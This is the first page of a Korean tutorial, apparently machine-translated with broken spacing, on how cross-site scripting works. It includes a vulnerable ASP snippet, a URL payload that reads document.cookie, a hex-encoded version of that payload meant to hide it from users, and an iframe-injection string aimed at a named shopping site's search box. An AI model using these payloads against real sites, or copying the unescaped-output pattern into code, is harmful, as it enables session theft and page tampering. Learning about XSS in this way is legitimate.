크로스 스 크 립 트(Cross-SiteScripting)XSS 공격 원리 분석 1/4 페이지
<%
Response.Write(Request.Querystring("name"))
%>
만약 내 가 들 어 온 name 의 값 이:
http://www.xxx.com/reg.asp?name=<script>x=document.cookie;alert(x);</script>
물론 이렇게 하 는 것 은 은밀 성 이 없습니다.앞의 xxx.com 은 소수의 사람 을 속 였 지만 대부분 사람들 은 뒤의 자바 script 코드 를 식별 할 수 있 습 니 다.그래서 저 는 뒤의 자바 script 코드 를 URL 의 16 진법 으로 바 꿔 야 합 니 다.예 를 들 어
http://www.xxx.com/reg.asp?name=%3C%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E
위의 URL 을 아 시 겠 습 니까?네가 그것 을 바 꾸 지 않 는 한.진 변환 은 Napkin 도 구 를 사용 할 수 있 습 니 다.아,너무 나 빠 요..)근본 원인 1.입력 을 제약 하지 않 고 출력 을 인 코딩 하지 않 았 습 니 다.2.'데이터'와'코드'예 시 를 엄 격 히 구분 하지 않 았 습 니 다.유명한 타 오 바 오 네트워크 에 도 이러한 구멍 이 존재 하 는 것 을 발 견 했 습 니 다.우 리 는 검색 상자 에 입력 했 습 니 다
"/><div style="position:absolute;left:0px;top:0px;"><iframe src="http://www.baidu.com" FRAMEBORDER=0 width=1000 height=900/></div><a href="
이렇게 해서 우 리 는 타 오 바 오의 원래 페이지 를 수정 하고 아래 에 바 이 두 의 첫 페이지 를 삽입 하 였 습 니 다.효 과 는 그림 과 같다
1 2 3 4 다음 페이지 전문 을 읽다
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
[TIL] XSSXSS란? 권한 없는 사용자가 웹 사이트에 악성 스크립트를 삽입하는 공격 방법. 주로 게시판 같은 곳에 스크립트가 포함된 게시글을 작성하는 형태로 이루어진다. xss 실습 예제 1) 예제 2) 글 작성자가 HTML ...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.